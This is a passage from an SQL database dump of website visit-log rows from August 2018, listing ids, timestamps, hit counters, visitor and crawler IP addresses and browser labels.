0,0,'54.36.148.51','other'),(287275,1534154444,1,1,0,0,'95.134.202.129','chrome'),(287276,1534154542,1,1,0,0,'176.36.234.202','other'),(287277,1534154751,1,1,0,0,'91.196.178.98','chrome'),(287278,1534154779,1,1,0,0,'178.154.171.88','other'),(287279,1534154830,1,1,0,0,'46.211.92.99','chrome'),(287280,1534154886,1,1,0,0,'95.163.255.181','other'),(287281,1534155116,1,1,0,0,'94.178.147.98','chrome'),(287282,1534155271,1,1,0,0,'37.73.128.177','chrome'),(287283,1534155300,1,1,0,0,'31.13.114.244','other'),(287284,1534155360,1,1,0,0,'193.171.202.150','other'),(287285,1534155558,2,2,0,0,'91.196.178.99','chrome'),(287286,1534155670,1,1,0,0,'31.13.125.87','other'),(287287,1534155672,1,1,0,0,'31.13.114.48','other'),(287288,1534155684,1,1,0,0,'213.180.203.8','other'),(287289,1534155722,1,1,0,0,'141.8.142.74','other'),(287290,1534155736,1,1,0,0,'95.133.193.197','other'),(287291,1534155797,1,1,0,0,'91.193.166.97','chrome'),(287292,1534156030,1,1,0,0,'46.211.26.168','chrome'),(287293,1534156107,1,1,0,0,'37.73.92.215','chrome'),(287294,1534156260,1,1,0,0,'54.36.148.96','other'),(287295,1534156572,1,1,0,0,'78.111.190.207','chrome'),(287296,1534156705,1,1,0,0,'37.73.147.240','chrome'),(287297,1534156720,2,2,0,0,'37.9.113.182','other'),(287298,1534156807,1,1,0,0,'8.29.198.25','other'),(287299,1534156824,1,1,0,0,'91.196.178.97','chrome'),(287300,1534156837,1,1,0,0,'54.36.149.10','other'),(287301,1534156944,2,2,0,0,'141.8.142.74','other'),(287302,1534156946,1,1,0,0,'46.211.48.252','other'),(287303,1534156965,1,1,0,0,'87.250.224.46','other'),(287304,1534157065,1,1,0,0,'54.36.148.17','other'),(287305,1534157118,1,1,0,0,'91.237.107.23','chrome'),(287306,1534157172,1,1,0,0,'91.196.178.89','chrome'),(287307,1534157293,1,1,0,0,'54.36.148.46','other'),(287308,1534157413,1,1,0,0,'5.28.155.192','other'),(287309,1534157626,1,1,0,0,'37.55.151.123','chrome'),(287310,1534157710,1,1,0,0,'54.36.149.84','other'),(287311,1534157822,1,0,1,0,'66.249.66.155',''),(287312,1534157868,1,1,0,0,'37.73.238.126','chrome'),(287313,1534157870,1,1,0,0,'188.163.18.72','chrome'),(287314,1534157871,1,1,0,0,'141.8.142.74','other'),(287315,1534158024,1,1,0,0,'40.77.167.70','other'),(287316,1534158033,1,1,0,0,'54.36.148.130','other'),(287317,1534158116,1,1,0,0,'31.13.112.136','other'),(287318,1534158129,1,1,0,0,'54.36.148.111','other'),(287319,1534158195,1,1,0,0,'54.36.149.17','other'),(287320,1534158229,1,1,0,0,'37.73.165.108','chrome'),(287321,1534158662,1,1,0,0,'91.196.178.186','chrome'),(287322,1534158803,1,1,0,0,'194.187.218.186','chrome'),(287323,1534158878,1,1,0,0,'8.29.198.27','other'),(287324,1534158942,1,1,0,0,'185.220.102.8','other'),(287325,1534158943,1,1,0,0,'54.36.148.147','other'),(287326,1534159083,1,1,0,0,'54.36.148.166','other'),(287327,1534159133,1,1,0,0,'54.36.148.197','other'),(287328,1534159574,1,1,0,0,'37.73.161.197','other'),(287329,1534159814,1,1,0,0,'91.196.178.33','chrome'),(287330,1534159945,1,1,0,0,'54.36.148.86','other'),(287331,1534160070,1,1,0,0,'37.73.171.200','chrome'),(287332,1534160075,1,1,0,0,'37.73.233.97','chrome'),(287333,1534160230,1,1,0,0,'31.13.126.82','other'),(287334,1534160255,1,1,0,0,'46.32.124.53','other'),(287335,1534160706,1,1,0,0,'54.36.149.54','other'),(287336,1534160751,1,1,0,0,'37.73.155.44','chrome'),(287337,1534160755,1,1,0,0,'54.36.149.69','other'),(287338,1534160791,1,1,0,0,'46.211.138.52','chrome'),(287339,1534160850,1,1,0,0,'91.196.178.84','other'),(287340,1534161070,1,1,0,0,'94.153.170.250','other'),(287341,1534161121,1,1,0,0,'54.36.148.85','other'),(287342,1534161803,1,1,0,0,'95.134.170.9','chrome'),(287343,1534161839,1,1,0,0,'66.220.156.56','other'),(287344,1534161878,1,1,0,0,'180.76.15.23','other'),(287345,1534161937,1,1,0,0,'82.145.208.34','other'),(287346,1534162091,1,1,0,0,'141.8.142.74','other'),(287347,1534162141,1,1,0,0,'95.134.74.240','chrome'),(287348,1534162178,1,1,0,0,'95.132.45.246','chrome'),(287349,1534162193,1,1,0,0,'91.237.107.26','chrome'),(287350,1534162236,1,1,0,0,'82.145.208.69','other'),(287351,1534162276,2,2,0,0,'216.244.66.241','other'),(287352,1534162409,2,2,0,0,'91.196.178.41','chrome'),(287353,1534162469,2,2,0,0,'178.210.137.226','chrome'),(287354,1534162537,1,1,0,0,'144.76.7.79','other'),(287355,1534162551,1,1,0,0,'51.15.15.79','other'),(287356,1534162605,1,1,0,0,'217.27.150.50','other'),(287357,1534162671,1,1,0,0,'176.115.103.110','chrome'),(287358,1534162679,1,1,0,0,'91.196.178.71','chrome'),(287359,1534162722,1,1,0,0,'54.36.149.101','other'),(287360,1534162851,3,3,0,0,'78.47.244.172','other'),(287361,1534162893,1,1,0,0,'46.141.43.232','chrome'),(287362,1534162970,1,1,0,0,'83.245.233.141','chrome'),(287363,1534162977,1,1,0,0,'2.55.48.204','other'),(287364,1534163024,1,1,0,0,'69.171.225.246','other'),(287365,1534163102,1,1,0,0,'31.13.113.176','other'),(287366,1534163110,1,1,0,0,'31.13.113.81','other'),(287367,1534163122,1,1,0,0,'66.220.149.3','other'),(287368,1534163130,1,1,0,0,'54.36.148.112','other'),(287369,1534163145,1,1,0,0,'178.92.164.144','chrome'),(287370,1534163186,1,1,0,0,'178.251.109.249','chrome'),(287371,1534163209,1,1,0,0,'94.45.42.102','other'),(287372,1534163268,1,1,0,0,'176.96.198.211','other'),(287373,1534163317,1,1,0,0,'141.8.142.74','other'),(287374,1534163352,1,1,0,0,'46.211.120.75','chrome'),(287375,1534163365,1,1,0,0,'80.70.77.132','other'),(287376,1534163377,2,2,0,0,'91.196.178.81','chrome'),(287377,1534163423,1,1,0,0,'37.73.155.44','chrome'),(287378,1534163438,1,1,0,0,'91.196.179.33','chrome'),(287379,1534163465,1,1,0,0,'54.36.149.6','other'),(287380,1534163550,1,1,0,0,'91.196.178.98','chrome'),(287381,1534163610,1,1,0,0,'54.36.149.49','other'),(287382,1534163612,1,1,0,0,'91.196.177.193','firefox'),(287383,1534163757,1,1,0,0,'31.13.114.49','other'),(287384,1534163758,1,1,0,0,'31.13.126.72','other'),(287385,1534163784,1,1,0,0,'54.36.148.157','other'),(287386,1534163887,1,1,0,0,'91.196.178.42','chrome'),(287387,1534163946,2,2,0,0,'91.196.177.15','chrome'),(287388,1534163950,1,1,0,0,'54.36.148.104','other'),(287389,1534164038,1,1,0,0,'54.36.149.89','other'),(287390,1534164076,1,1,0,0,'91.196.178.172','chrome'),(287391,1534164086,1,1,0,0,'91.196.178.103','other'),(287392,1534164132,1,1,0,0,'91.196.178.186','chrome'),(287393,1534164133,1,1,0,0,'31.13.125.54','other'),(287394,1534164445,1,0,1,0,'66.249.66.75',''),(287395,1534164472,1,1,0,0,'66.249.66.74','chrome'),(287396,1534164479,1,1,0,0,'66.249.66.156','chrome'),(287397,1534164507,1,1,0,0,'91.196.177.28','firefox'),(287398,1534164531,1,1,0,0,'91.196.178.176','chrome'),(287399,1534164794,1,1,0,0,'54.36.149.95','other'),(287400,1534164910,1,1,0,0,'216.244.66.241','other'),(287401,1534165033,1,1,0,0,'91.196.177.46','firefox'),(287402,1534165081,2,2,0,0,'176.108.106.6','chrome'),(287404,1534165083,1,1,0,0,'128.30.52.96','other'),(287405,1534165236,1,1,0,0,'173.252.84.52','other'),(287406,1534165266,1,1,0,0,'54.36.148.90','other'),(287407,1534165274,1,1,0,0,'46.211.159.120','other'),(287408,1534165396,1,1,0,0,'66.102.9.29','chrome'),(287409,1534165469,1,1,0,0,'62.205.134.182','msie'),(287410,1534165474,1,1,0,0,'54.36.149.5','other'),(287411,1534165479,1,1,0,0,'91.196.179.33','chrome'),(287412,1534165480,1,1,0,0,'87.250.224.46','other'),(287413,1534165482,1,1,0,0,'178.154.171.88','other'),(287414,1534165486,1,1,0,0,'91.196.178.189','chrome'),(287415,1534165661,1,1,0,0,'91.196.178.71','chrome'),(287416,1534165666,1,1,0,0,'37.9.113.182','other'),(287417,1534165716,1,1,0,0,'80.70.73.242','chrome'),(287418,1534165722,1,1,0,0,'54.36.148.252','other'),(287419,1534165755,1,1,0,0,'54.36.148.237','other'),(287420,1534165777,1,1,0,0,'91.196.178.133','firefox'),(287421,1534165931,1,1,0,0,'91.196.178.97','other'),(287422,1534165936,1,1,0,0,'54.36.148.153','other'),(287423,1534165948,1,1,0,0,'178.212.240.218','other'),(287424,1534165989,1,1,0,0,'54.36.148.53','other'),(287425,1534166022,1,1,0,0,'91.196.178.186','chrome'),(287426,1534166127,1,1,0,0,'31.13.114.114','other'),(287427,1534166167,1,1,0,0,'176.126.252.12','other'),(287428,1534166265,1,1,0,0,'54.36.149.7','other'),(287429,1534166436,1,1,0,0,'193.110.112.81','chrome'),(287430,1534166555,1,1,0,0,'66.220.156.146','other'),(287431,1534166556,1,1,0,0,'176.118.139.179','other'),(287432,1534166639,1,1,0,0,'141.8.142.74','other'),(287433,1534166870,1,1,0,0,'46.211.26.3','other'),(287434,1534166942,1,1,0,0,'194.44.218.109','chrome'),(287435,1534167016,1,1,0,0,'109.251.158.210','chrome'),(287436,1534167107,1,1,0,0,'54.36.148.116','other'),(287437,1534167213,1,1,0,0,'91.196.177.20','chrome'),(287438,1534167283,1,1,0,0,'91.196.178.103','chrome'),(287439,1534167371,1,1,0,0,'31.13.114.48','other'),(287440,1534167517,1,1,0,0,'46.211.3.216','other'),(287441,1534167542,1,1,0,0,'157.55.39.90','other'),(287442,1534167561,1,1,0,0,'31.41.65.169','chrome'),(287443,1534167647,1,1,0,0,'8.29.198.25','other'),(287444,1534167709,1,1,0,0,'141.8.142.74','other'),(287445,1534167725,1,1,0,0,'216.244.66.241','other'),(287446,1534167811,1,1,0,0,'78.154.171.194','chrome'),(287447,1534168026,2,2,0,0,'178.154.171.88','other'),(287448,1534168076,1,1,0,0,'46.211.153.124','other'),(287449,1534168149,1,1,0,0,'54.36.149.96','other'),(287450,1534168165,1,1,0,0,'46.134.147.217','chrome'),(287451,1534168346,1,1,0,0,'54.36.148.87','other'),(287452,1534168470,1,1,0,0,'91.196.178.40','chrome'),(287453,1534168483,1,1,0,0,'46.211.248.40','other'),(287454,1534168508,1,1,0,0,'54.36.149.76','other'),(287455,1534168537,1,1,0,0,'54.36.148.40','other'),(287456,1534168655,1,1,0,0,'82.207.73.218','chrome'),(287457,1534168693,1,1,0,0,'194.88.153.168','chrome'),(287458,1534168776,1,1,0,0,'46.211.120.177','chrome'),(287459,1534168917,1,1,0,0,'91.196.178.71','chrome'),(287460,1534168953,1,1,0,0,'176.105.168.140','chrome'),(287461,1534168965,1,1,0,0,'54.36.148.100','other'),(287462,1534168968,1,1,0,0,'194.44.89.148','chrome'),(287463,1534169030,1,1,0,0,'141.8.142.74','other'),(287464,1534169207,1,1,0,0,'14.215.176.140','firefox'),(287465,1534169275,1,1,0,0,'54.36.149.20','other'),(287466,1534169458,1,1,0,0,'54.36.148.182','other'),(287467,1534169596,1,1,0,0,'109.207.199.237','other'),(287468,1534169732,1,1,0,0,'178.175.131.194','other'),(287469,1534169739,1,1,0,0,'8.29.198.26','other'),(287470,1534169980,1,1,0,0,'54.36.149.81','other'),(287471,1534169989,1,1,0,0,'95.47.47.229','other'),(287472,1534170071,1,1,0,0,'91.196.178.51','chrome'),(287473,1534170138,1,1,0,0,'66.220.152.54','other'),(287474,1534170244,1,1,0,0,'37.73.165.144','chrome'),(287475,1534170315,1,1,0,0,'54.36.148.160','other'),(287476,1534170509,1,1,0,0,'54.36.148.231','other'),(287477,1534170524,1,1,0,0,'141.8.142.74','other'),(287478,1534170543,1,1,0,0,'91.217.13.51','chrome'),(287479,1534170640,1,1,0,0,'91.196.178.169','chrome'),(287480,1534170816,1,1,0,0,'54.36.148.251','other'),(287481,1534170921,1,1,0,0,'54.36.148.21','other'),(287482,1534170967,1,1,0,0,'216.244.66.241','other'),(287483,1534171092,1,1,0,0,'37.73.209.37','other'),(287484,1534171118,1,1,0,0,'173.252.85.112','other'),(287485,1534171237,2,2,0,0,'95.134.203.79','chrome'),(287486,1534171330,1,1,0,0,'54.36.148.193','other'),(287487,1534171444,1,1,0,0,'54.36.148.209','other'),(287488,1534171668,1,1,0,0,'173.252.84.113','other'),(287489,1534171706,1,1,0,0,'54.36.148.168','other'),(287490,1534171849,1,1,0,0,'91.196.177.175','chrome'),(287491,1534171930,1,1,0,0,'54.36.148.184','other'),(287492,1534172051,1,0,1,0,'66.249.66.157',''),(287493,1534172182,1,1,0,0,'91.196.178.88','chrome'),(287494,1534172225,1,1,0,0,'141.8.142.74','other'),(287495,1534172267,1,1,0,0,'37.47.42.17','chrome'),(287496,1534172388,1,1,0,0,'31.129.233.254','chrome'),(287497,1534172450,1,1,0,0,'188.163.5.59','chrome'),(287498,1534172534,1,1,0,0,'188.230.43.254','other'),(287499,1534172635,1,1,0,0,'31.13.124.203','other'),(287500,1534172714,1,1,0,0,'54.36.148.246','other'),(287501,1534172783,1,1,0,0,'54.36.148.164','other'),(287502,1534172819,1,1,0,0,'54.36.148.186','other'),(287503,1534172821,1,1,0,0,'216.244.66.241','other'),(287504,1534173008,1,1,0,0,'54.36.149.100','other'),(287505,1534173105,1,1,0,0,'174.203.12.66','other'),(287506,1534173362,1,1,0,0,'87.250.224.46','other'),(287507,1534173366,1,1,0,0,'54.36.148.169','other'),(287508,1534173494,1,1,0,0,'185.109.206.35','other'),(287509,1534173711,1,1,0,0,'37.54.115.205','chrome'),(287510,1534173864,1,1,0,0,'54.36.148.81','other'),(287511,1534173890,1,1,0,0,'54.36.149.51','other'),(287512,1534174021,1,1,0,0,'54.36.149.14','other'),(287513,1534174138,1,1,0,0,'54.36.149.54','other'),(287514,1534174183,1,1,0,0,'37.73.168.171','chrome'),(287515,1534174242,1,1,0,0,'46.211.153.140','other'),(287516,1534174298,1,1,0,0,'54.36.148.158','other'),(287517,1534174542,1,1,0,0,'54.36.148.215','other'),(287518,1534174561,1,1,0,0,'92.113.188.56','chrome'),(287519,1534174700,1,1,0,0,'54.36.148.53','other'),(287520,1534174749,1,1,0,0,'54.36.148.225','other'),(287521,1534174793,1,1,0,0,'54.36.148.134','other'),(287522,1534174858,1,1,0,0,'216.244.66.241','other'),(287523,1534174927,1,1,0,0,'188.230.43.254','other'),(287524,1534174940,1,1,0,0,'93.171.163.228','other'),(287525,1534175462,1,1,0,0,'54.36.148.113','other'),(287526,1534175513,1,1,0,0,'91.196.178.99','chrome'),(287527,1534175534,1,1,0,0,'66.102.9.27','chrome'),(287528,1534175535,1,0,1,0,'66.249.66.156',''),(287529,1534175542,1,1,0,0,'31.13.124.48','other'),(287530,1534175766,2,2,0,0,'141.8.142.74','other'),(287531,1534175986,1,1,0,0,'91.196.178.39','other'),(287532,1534176296,1,1,0,0,'54.36.148.245','other'),(287533,1534176517,1,1,0,0,'54.36.149.39','other'),(287534,1534176904,1,1,0,0,'91.196.178.97','other'),(287535,1534176932,1,1,0,0,'31.13.113.67','other'),(287536,1534177165,1,1,0,0,'91.196.178.130','chrome'),(287537,1534177180,1,1,0,0,'54.36.148.136','other'),(287538,1534177217,2,2,0,0,'141.8.142.74','other'),(287539,1534177282,1,1,0,0,'69.63.188.201','other'),(287540,1534177332,1,1,0,0,'188.230.43.254','other'),(287541,1534177455,1,1,0,0,'54.36.149.18','other'),(287542,1534177640,1,1,0,0,'54.36.148.43','other'),(287543,1534177711,1,1,0,0,'91.196.178.88','chrome'),(287544,1534177812,1,1,0,0,'46.211.48.90','other'),(287545,1534177824,1,1,0,0,'54.36.148.27','other'),(287546,1534177868,1,1,0,0,'46.133.102.234','chrome'),(287547,1534177946,1,1,0,0,'91.196.178.185','chrome'),(287548,1534177973,1,1,0,0,'54.36.148.118','other'),(287549,1534178096,1,1,0,0,'54.36.149.4','other'),(287550,1534178422,1,1,0,0,'54.36.148.109','other'),(287551,1534178478,1,1,0,0,'91.196.178.66','chrome'),(287552,1534178489,1,1,0,0,'8.29.198.27','other'),(287553,1534178518,1,1,0,0,'46.211.4.156','other'),(287554,1534178716,1,1,0,0,'54.36.149.12','other'),(287555,1534178794,1,1,0,0,'188.230.43.254','other'),(287556,1534178861,1,1,0,0,'94.254.145.43','other'),(287557,1534179212,1,1,0,0,'91.196.178.182','chrome'),(287558,1534179513,1,1,0,0,'54.36.148.97','other'),(287559,1534179565,1,1,0,0,'141.8.142.74','other'),(287560,1534179716,1,1,0,0,'54.36.148.180','other'),(287561,1534179954,1,1,0,0,'91.196.178.47','other'),(287562,1534179957,1,1,0,0,'91.196.178.69','chrome'),(287563,1534180041,1,1,0,0,'54.36.148.107','other'),(287564,1534180106,1,1,0,0,'93.78.117.116','firefox'),(287565,1534180207,1,1,0,0,'54.36.148.24','other'),(287566,1534180218,1,1,0,0,'54.36.149.10','other'),(287567,1534180381,1,1,0,0,'54.36.148.227','other'),(287568,1534180579,1,1,0,0,'8.29.198.26','other'),(287569,1534181036,1,1,0,0,'95.153.135.164','other'),(287570,1534181078,1,1,0,0,'54.36.148.207','other'),(287571,1534181148,1,1,0,0,'188.230.43.254','other'),(287572,1534181184,1,1,0,0,'46.133.217.156','chrome'),(287573,1534181398,1,1,0,0,'92.112.105.243','chrome'),(287574,1534181458,1,1,0,0,'54.36.148.23','other'),(287575,1534181479,1,1,0,0,'91.196.178.35','chrome'),(287576,1534181783,1,1,0,0,'54.36.149.22','other'),(287577,1534181982,1,1,0,0,'54.36.148.116','other'),(287578,1534182020,1,1,0,0,'54.36.148.208','other'),(287579,1534182165,1,1,0,0,'91.196.178.44','chrome'),(287580,1534182506,1,1,0,0,'91.196.178.82','chrome'),(287581,1534182530,1,1,0,0,'91.196.177.153','other'),(287582,1534182604,2,2,0,0,'193.194.127.222','firefox'),(287583,1534182607,1,1,0,0,'31.13.126.72','other'),(287584,1534182641,1,1,0,0,'91.196.178.66','other'),(287585,1534182736,2,2,0,0,'141.8.142.74','other'),(287586,1534182819,1,1,0,0,'54.36.148.165','other'),(287587,1534183373,1,1,0,0,'54.36.148.236','other'),(287588,1534183382,1,1,0,0,'92.113.189.235','chrome'),(287589,1534183445,1,1,0,0,'95.133.152.120','chrome'),(287590,1534183556,1,1,0,0,'54.36.148.184','other'),(287591,1534183595,1,0,1,0,'66.249.66.157',''),(287592,1534183632,1,1,0,0,'51.255.65.46','other'),(287593,1534184000,1,1,0,0,'54.36.148.217','other'),(287594,1534184037,1,1,0,0,'91.196.178.189','chrome'),(287595,1534184086,1,1,0,0,'91.196.178.44','chrome'),(287596,1534184137,1,1,0,0,'37.73.203.153','chrome'),(287597,1534184227,1,1,0,0,'54.36.149.19','other'),(287598,1534184427,1,1,0,0,'54.36.148.244','other'),(287599,1534184543,1,1,0,0,'54.36.148.64','other'),(287600,1534184557,1,1,0,0,'54.36.149.64','other'),(287601,1534184621,1,1,0,0,'216.244.66.241','other'),(287602,1534184659,1,1,0,0,'54.36.148.57','other'),(287603,1534185064,1,1,0,0,'54.36.148.63','other'),(287604,1534185097,1,1,0,0,'91.196.178.182','chrome'),(287605,1534185098,1,1,0,0,'54.36.148.195','other'),(287606,1534185120,1,1,0,0,'54.36.149.23','other'),(287607,1534185304,1,1,0,0,'54.36.149.95','other'),(287608,1534185351,1,1,0,0,'46.211.152.187','chrome'),(287609,1534185500,1,1,0,0,'93.74.37.104','other'),(287610,1534185601,2,2,0,0,'141.8.142.74','other'),(287611,1534185828,1,1,0,0,'54.36.148.236','other'),(287612,1534186057,1,1,0,0,'69.171.226.25','other'),(287613,1534186261,1,1,0,0,'91.196.178.86','other'),(287614,1534186543,1,1,0,0,'54.165.59.7','other'),(287615,1534186868,1,1,0,0,'213.239.216.194','other'),(287616,1534186957,1,1,0,0,'54.36.148.171','other'),(287617,1534187320,1,1,0,0,'54.36.149.26','other'),(287618,1534187417,1,1,0,0,'54.36.148.198','other'),(287619,1534187436,1,1,0,0,'54.36.148.52','other'),(287620,1534187618,1,1,0,0,'91.196.178.134','other'),(287621,1534187815,1,1,0,0,'51.255.65.46','other'),(287622,1534188036,1,1,0,0,'91.196.178.92','chrome'),(287623,1534188267,1,1,0,0,'91.196.177.11','other'),(287624,1534188307,1,0,1,0,'66.249.66.157',''),(287625,1534188675,1,1,0,0,'54.36.148.141','other'),(287626,1534188699,2,2,0,0,'216.244.66.241','other'),(287627,1534188952,1,1,0,0,'54.36.149.1','other'),(287628,1534188983,1,1,0,0,'66.249.81.198','chrome'),(287629,1534189334,1,1,0,0,'8.29.198.26','other'),(287630,1534189978,1,1,0,0,'54.36.149.28','other'),(287631,1534189981,1,1,0,0,'54.36.148.108','other'),(287632,1534190076,1,1,0,0,'91.196.178.131','chrome'),(287633,1534190113,1,1,0,0,'31.13.126.78','other'),(287634,1534190272,1,1,0,0,'46.211.158.135','other'),(287635,1534190346,1,1,0,0,'54.36.149.56','other'),(287636,1534190488,1,1,0,0,'46.211.47.251','other'),(287637,1534190713,1,1,0,0,'91.196.178.80','chrome'),(287638,1534190738,1,1,0,0,'91.196.178.103','other'),(287639,1534190827,1,1,0,0,'54.36.148.215','other'),(287640,1534190868,1,1,0,0,'37.73.140.238','other'),(287641,1534190910,1,1,0,0,'54.36.149.37','other'),(287642,1534191407,1,1,0,0,'8.29.198.26','other'),(287643,1534191453,1,1,0,0,'149.28.182.236','firefox'),(287644,1534191514,1,1,0,0,'54.36.149.1','other'),(287645,1534191521,2,2,0,0,'141.8.142.74','other'),(287646,1534191620,1,1,0,0,'91.196.178.134','chrome'),(287647,1534191700,1,1,0,0,'54.36.148.33','other'),(287648,1534191737,1,1,0,0,'85.139.130.130','chrome'),(287649,1534191739,1,1,0,0,'54.36.148.216','other'),(287650,1534192554,1,1,0,0,'54.36.148.68','other'),(287651,1534192593,1,1,0,0,'54.36.148.27','other'),(287652,1534192597,1,1,0,0,'178.154.171.88','other'),(287653,1534192747,1,1,0,0,'54.36.148.148','other'),(287654,1534193359,1,1,0,0,'91.196.178.161','chrome'),(287655,1534193897,1,1,0,0,'94.179.209.213','chrome'),(287656,1534194132,5,5,0,0,'217.182.205.145','other'),(287657,1534194196,1,1,0,0,'54.36.148.45','other'),(287658,1534194617,1,0,1,0,'66.249.66.155',''),(287659,1534194688,1,1,0,0,'194.88.153.168','chrome'),(287660,1534195046,1,1,0,0,'54.36.148.118','other'),(287661,1534195196,1,1,0,0,'37.73.214.7','chrome'),(287662,1534195277,1,1,0,0,'54.36.149.72','other'),(287663,1534195315,1,1,0,0,'66.249.66.155','chrome'),(287664,1534195324,2,1,1,0,'66.249.66.74',''),(287665,1534195369,1,1,0,0,'141.8.142.74','other'),(287666,1534195611,1,1,0,0,'54.36.148.253','other'),(287667,1534196074,1,1,0,0,'91.196.178.136','chrome'),(287668,1534196262,1,1,0,0,'46.151.80.78','other'),(287669,1534196528,1,1,0,0,'54.36.148.66','other'),(287670,1534196689,2,2,0,0,'54.36.148.184','other'),(287671,1534196720,1,1,0,0,'54.36.149.29','other'),(287672,1534196757,1,1,0,0,'54.36.149.18','other'),(287673,1534197204,1,1,0,0,'91.209.11.236','other'),(287674,1534197239,1,0,1,0,'66.249.66.157',''),(287675,1534197335,1,1,0,0,'178.154.171.88','other'),(287676,1534197419,2,2,0,0,'54.36.148.182','other'),(287677,1534197746,1,1,0,0,'54.36.148.99','other'),(287678,1534197970,1,0,1,0,'66.249.66.156',''),(287679,1534198255,1,1,0,0,'54.36.148.81','other'),(287680,1534198705,1,1,0,0,'54.36.149.19','other'),(287681,1534198775,1,1,0,0,'54.36.148.101','other'),(287682,1534198885,1,1,0,0,'185.17.146.119','chrome'),(287683,1534198901,35,35,0,0,'38.132.124.227','other'),(287684,1534199044,1,1,0,0,'37.9.113.101','other'),(287685,1534199302,1,1,0,0,'54.36.148.129','other'),(287686,1534199304,1,1,0,0,'37.9.113.100','other'),(287687,1534199357,2,2,0,0,'157.55.39.225','other'),(287688,1534199376,1,1,0,0,'37.9.113.132','other'),(287689,1534199612,1,1,0,0,'40.77.167.70','other'),(287690,1534199649,1,1,0,0,'54.36.148.221','other'),(287691,1534199850,1,1,0,0,'54.36.148.103','other'),(287692,1534199878,1,1,0,0,'54.36.148.48','other'),(287693,1534200182,1,1,0,0,'8.29.198.27','other'),(287694,1534200225,1,1,0,0,'54.36.148.253','other'),(287695,1534200282,1,1,0,0,'54.36.149.37','other'),(287696,1534200504,1,1,0,0,'54.36.148.157','other'),(287697,1534200611,1,0,1,0,'66.249.66.156',''),(287698,1534201043,1,1,0,0,'54.36.148.238','other'),(287699,1534201714,1,1,0,0,'54.36.148.138','other'),(287700,1534201838,1,1,0,0,'54.36.149.66','other'),(287701,1534202254,1,1,0,0,'8.29.198.27','other'),(287702,1534202380,1,1,0,0,'54.36.148.136','other'),(287703,1534202499,2,0,2,0,'66.249.66.157',''),(287704,1534203179,1,1,0,0,'35.162.214.175','chrome'),(287705,1534203354,1,1,0,0,'54.36.148.154','other'),(287706,1534203559,1,1,0,0,'54.36.149.61','other'),(287707,1534203702,1,1,0,0,'50.34.179.179','chrome'),(287708,1534203890,1,0,1,0,'66.249.66.155',''),(287709,1534204214,1,1,0,0,'216.244.66.241','other'),(287710,1534204487,1,1,0,0,'213.180.203.8','other'),(287711,1534204509,1,1,0,0,'54.36.149.41','other'),(287712,1534204969,1,1,0,0,'54.36.149.85','other'),(287713,1534205249,1,1,0,0,'178.154.171.88','other'),(287714,1534205782,1,1,0,0,'54.36.149.104','other'),(287715,1534206057,1,1,0,0,'37.229.198.129','firefox'),(287716,1534206145,1,0,1,0,'66.249.66.157',''),(287717,1534206718,1,1,0,0,'54.36.148.87','other'),(287718,1534207134,1,1,0,0,'178.154.171.88','other'),(287719,1534207149,1,1,0,0,'54.36.148.248','other'),(287720,1534207184,1,1,0,0,'37.9.113.115','other'),(287721,1534207406,1,1,0,0,'157.55.39.225','other'),(287722,1534207465,2,0,2,0,'66.249.66.155',''),(287723,1534207929,1,1,0,0,'54.36.148.75','other'),(287724,1534207977,1,1,0,0,'54.36.148.158','other'),(287725,1534208131,1,1,0,0,'54.36.148.23','other'),(287726,1534208362,1,1,0,0,'216.244.66.241','other'),(287727,1534208466,1,1,0,0,'54.36.148.54','other'),(287728,1534208488,1,1,0,0,'54.36.148.26','other'),(287729,1534208837,1,1,0,0,'54.36.148.108','other'),(287730,1534209112,1,1,0,0,'54.36.148.222','other'),(287731,1534209703,1,1,0,0,'37.9.113.115','other'),(287732,1534209774,1,1,0,0,'54.36.149.92','other'),(287733,1534209983,1,1,0,0,'94.178.147.149','chrome'),(287734,1534210112,1,0,1,0,'66.249.66.155',''),(287735,1534210141,1,1,0,0,'37.73.103.216','chrome'),(287736,1534210243,1,1,0,0,'54.36.148.101','other'),(287737,1534210329,1,1,0,0,'54.36.149.53','other'),(287738,1534210331,1,1,0,0,'54.36.148.141','other'),(287739,1534210401,1,1,0,0,'31.13.115.11','other'),(287740,1534210499,1,1,0,0,'54.36.148.246','other'),(287741,1534210666,1,1,0,0,'54.36.148.192','other'),(287742,1534210694,1,1,0,0,'54.36.148.205','other'),(287743,1534210814,1,0,1,0,'66.249.66.156',''),(287744,1534210845,1,1,0,0,'54.36.149.77','other'),(287745,1534210861,1,1,0,0,'54.36.148.22','other'),(287746,1534211025,1,1,0,0,'8.29.198.27','other'),(287747,1534211591,2,2,0,0,'141.8.142.74','other'),(287748,1534211820,1,1,0,0,'54.36.148.152','other'),(287749,1534211930,1,1,0,0,'54.36.148.19','other'),(287750,1534212079,1,0,1,0,'66.249.66.157',''),(287751,1534212149,1,1,0,0,'54.36.148.164','other'),(287752,1534212151,1,1,0,0,'157.55.39.225','other'),(287753,1534212361,1,1,0,0,'54.36.148.232','other'),(287754,1534212838,1,1,0,0,'66.249.66.75','chrome'),(287755,1534212842,1,1,0,0,'66.249.66.157','chrome'),(287756,1534212845,1,0,1,0,'66.249.66.76',''),(287757,1534213097,1,1,0,0,'8.29.198.26','other'),(287758,1534213460,1,1,0,0,'178.154.171.88','other'),(287759,1534213473,1,0,1,0,'66.249.66.156',''),(287760,1534213795,1,1,0,0,'216.244.66.241','other'),(287761,1534213956,1,1,0,0,'35.162.70.167','chrome'),(287762,1534216263,1,1,0,0,'54.36.148.60','other'),(287763,1534216275,1,1,0,0,'178.154.171.60','other'),(287764,1534216284,1,1,0,0,'37.53.171.94','chrome'),(287765,1534216707,1,1,0,0,'54.36.148.142','other'),(287766,1534216850,1,0,1,0,'66.249.66.155',''),(287767,1534217160,1,1,0,0,'54.36.148.249','other'),(287768,1534217284,1,1,0,0,'91.121.83.160','chrome'),(287769,1534217499,1,1,0,0,'54.36.148.131','other'),(287770,1534217540,1,1,0,0,'54.36.148.144','other'),(287771,1534217564,1,1,0,0,'66.102.9.40','chrome'),(287772,1534217695,1,1,0,0,'54.36.148.204','other'),(287773,1534217876,1,1,0,0,'66.102.9.38','chrome'),(287774,1534217888,1,1,0,0,'66.102.9.35','chrome'),(287775,1534217959,1,1,0,0,'54.36.148.171','other'),(287776,1534218123,1,1,0,0,'173.212.213.176','other'),(287777,1534218426,1,1,0,0,'54.36.149.105','other'),(287778,1534218611,1,1,0,0,'37.52.114.195','other'),(287779,1534218773,2,2,0,0,'95.213.141.126','opera'),(287780,1534218970,1,1,0,0,'87.250.224.66','other'),(287781,1534218981,1,1,0,0,'77.111.247.67','chrome'),(287782,1534219013,1,1,0,0,'178.154.200.41','other'),(287783,1534219017,1,1,0,0,'54.